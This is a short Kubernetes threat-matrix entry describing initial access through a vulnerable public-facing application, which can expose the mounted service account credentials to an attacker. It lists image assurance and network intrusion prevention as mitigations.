Application vulnerability
Info
ID: MS-TA9004
Tactic: Initial Access
MITRE technique: T1190
Running a public-facing vulnerable application in a cluster can enable initial access to the cluster. A container that runs an application that is vulnerable to remote code execution vulnerability (RCE) may be exploited. If service account is mounted to the container (default behavior in Kubernetes), the attacker will be able to send requests to the API server using this service account credentials.
Mitigations
| ID | Mitigation | Description |
|---|---|---|
| MS-M9005 | Image Assurance Policy | Ensure that only images that passed the security compliance policies are pushed to registries and deployed to Kubernetes clusters. |
| MS-M9007 | Network Intrusion Prevention | Use network intrusion prevention to block exploiting vulnerabilities. |